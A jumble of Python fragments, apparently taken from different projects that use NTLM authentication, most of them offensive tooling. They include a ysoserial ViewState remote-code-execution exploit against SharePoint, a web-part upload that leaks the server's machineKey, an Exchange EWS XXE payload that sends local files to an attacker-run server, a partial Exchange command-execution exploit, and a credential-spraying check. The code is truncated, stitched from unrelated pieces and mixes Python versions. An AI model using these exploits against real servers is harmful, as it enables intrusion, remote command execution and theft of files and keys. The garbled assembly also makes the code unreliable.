def check_creds(opts):
url, domain, username, password, authtype, proxies = opts
if authtype == "ntlm":
if domain:
auth = HttpNtlmAuth(f"{domain}\\{username}", password)
else:
auth = HttpNtlmAuth(username, password)
else:
if domain:
auth = (f"{domain}\\{username}", password)
else:
auth = (username, password)
try:
res = requests.get(url,
verify=False,
proxies=proxies,
auth=auth,
allow_redirects=False)
if res.status_code != 401:
print(f"Success! {username}:{password}")
return username, password
except Exception as e:
print(f"Error occurred with {username}:{password}: {e}")
def trigger_rce(target, domain, path, user, password, cmd, key):
out = subprocess.Popen([
'yss/ysoserial.exe',
'-p', 'ViewState',
'-g', 'TypeConfuseDelegate',
'-c', '%s' % cmd,
'--apppath=%s' % path,
'--path=%s_layouts/15/zoombldr.aspx' % path,
'--islegacy',
'--validationalg=HMACSHA256',
'--validationkey=%s' % key
], stdout=subprocess.PIPE)
rce = { "__VIEWSTATE" : out.communicate()[0].decode() }
requests.post("http://%s/_layouts/15/zoombldr.aspx" % target, data=rce, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
def init_requests(self, domain, username, password):
self.logger = Logger().get_logger()
# create the sessions object for the requests
self.session = requests.Session()
self.session.verify = False
# update the ua flag
self.session.headers.update({'User-Agent': constants.USER_AGENT})
# check if we have to add the auth to our requests
if username and password:
if domain:
username = '******' % (domain, username)
self.session.auth = HttpNtlmAuth(username, password)
def put_page(target, domain, user, password):
payload = """<WebPartPages:DataFormWebPart runat="server">
<ParameterBindings>
<ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
</ParameterBindings>
<xsl>
<xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:param name="ssi" />
<xsl:template match="/">
<xsl:value-of select="$ssi" disable-output-escaping="yes" />
</xsl:template>
</xsl:stylesheet>
</xsl>
</WebPartPages:DataFormWebPart>"""
r = requests.put("http://%s/poc.aspx" % target, data=payload, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
assert (r.status_code == 200 or r.status_code == 201), "(-) page creation failed, user doesn't have site ownership rights!"
def main():
"""
The main function
"""
args = create_arguments()
auth = get_auth_info(args)
session = requests.Session()
session.auth = HttpNtlmAuth(auth["user"], auth["password"])
response = session.get(args.url)
cookie = {".ASPXauth": response.text}
response = session.get(args.url, cookies=cookie)
root = ElementTree.fromstring(response.text)
os.makedirs(RDP_FILES_PATH, exist_ok=True)
for item in root.findall("./{*}Publisher/{*}Resources/{*}Resource"):
parsed_resource = parse_resource(item)
for terminal_server in parsed_resource["terminal_servers"]:
rdp_file = download_rdp(cookie, terminal_server)
generate_desktop(parsed_resource, rdp_file)
def __init__(self, args):
o = urlparse(args.url)
self.url = args.url
self.service = o.path
self.username = args.username
self.password = args.password
self.target = args.target
self.headers = args.header
self.method = args.request
self.data = args.data
self.content_type = args.content_type
self.s = requests.Session()
self.s.auth = HttpNtlmAuth(self.username, self.password)
self.s.headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
}
self.s.proxies = {'http': 'http://127.0.0.1:8080'}
def __init__(self, site_root_url: str, username: str, password: str):
super().__init__()
## TODO: Add a regex check setter function
self.site_url = site_root_url
self.auth = HttpNtlmAuth(username=username, password=password)
def main(t, usr, pwd):
server = HTTPServer(('0.0.0.0', int(port)), xxe)
handlerthr = Thread(target=server.serve_forever, args=())
handlerthr.daemon = True
handlerthr.start()
username = usr.split("@")[0]
domain = usr.split("@")[1]
h = {"Content-type" : "text/xml; charset=utf-8"}
xxe_payload = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% start "<![CDATA[">
<!ENTITY %% stuff SYSTEM "file:///%s">
<!ENTITY %% end "]]>">
<!ENTITY %% dtd SYSTEM "http://%s:%d/poc.dtd">
%%dtd;
]>""" % (file, host, int(port))
d = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<soap:Header>
<t:RequestServerVersion Version="Exchange2010_SP2"></t:RequestServerVersion>
</soap:Header>
<soap:Body>
<m:RouteComplaint MessageDisposition="SaveOnly">
<m:Data>%s</m:Data>
</m:RouteComplaint>
</soap:Body>
</soap:Envelope>""" % b64encode(xxe_payload.encode()).decode("utf-8")
requests.post("https://%s/ews/Exchange.asmx" % t, data=d, headers=h, verify=False, auth=HttpNtlmAuth('%s\\%s' % (domain,username), pwd))
</t:NumberedRecurrence>
</t:Recurrence>
</t:CalendarItem>
</m:Items>
</m:CreateItem>
</soap:Body>
</soap:Envelope>
""" % payload2
res = requests.post("https://%s/ews/Exchange.asmx" % target,
data=payload1,
headers={
"Content-type": "text/xml; charset=utf-8",
},
verify=False,
auth=HttpNtlmAuth('%s' % (username), pwd))
if res.status_code != 200:
print("error 1")
exit()
ct = res.content
item_id = ct.split('<t:ItemId Id="')[1].split('"')[0]
change_key = ct.split('ChangeKey="')[1].split('"')[0]
print "Attacking target %s with user %s" % (target, username)
print "Sending command cmd.exe /c %s" % cmd
session = requests.Session()
header = {"Cookie": "mkt=en-US"}
data = {
"destination": "https://%s/owa" % target,
def get_vkey(target, domain, user, password):
h = { "360Vulcan": "<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->" }
r = requests.get("http://%s/poc.aspx" % target, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password), headers=h)
match = re.search("machineKey validationKey=\"(.{64})", r.text)
assert match, "(-) unable to leak the validation key, exploit failed!"
return match.group(1)